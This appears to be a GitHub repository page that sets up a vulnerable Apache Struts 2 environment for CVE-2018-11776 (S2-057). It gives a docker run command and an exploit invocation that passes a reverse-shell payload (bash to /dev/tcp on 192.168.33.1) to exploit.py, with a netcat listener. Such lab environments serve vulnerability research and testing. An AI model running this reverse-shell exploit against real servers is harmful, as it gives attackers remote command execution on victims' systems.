Skip to content

knqyf263/CVE-2018-11776

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2018-11776

Environment for CVE-2018-11776 / S2-057

Demo

demo

Run server

$ docker run -d --hostname struts2 --name cve-2018-11776 -p 30080:8080 knqyf263/cve-2018-11776

Exploit

$ nc -l 10000 (or nc -lp 10000)
$ python3 exploit.py localhost:30080 'bash -i >& /dev/tcp/192.168.33.1/10000  0>&1'

About

Environment for CVE-2018-11776 / S2-057 (Apache Struts 2)

Resources

License

Code of conduct

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published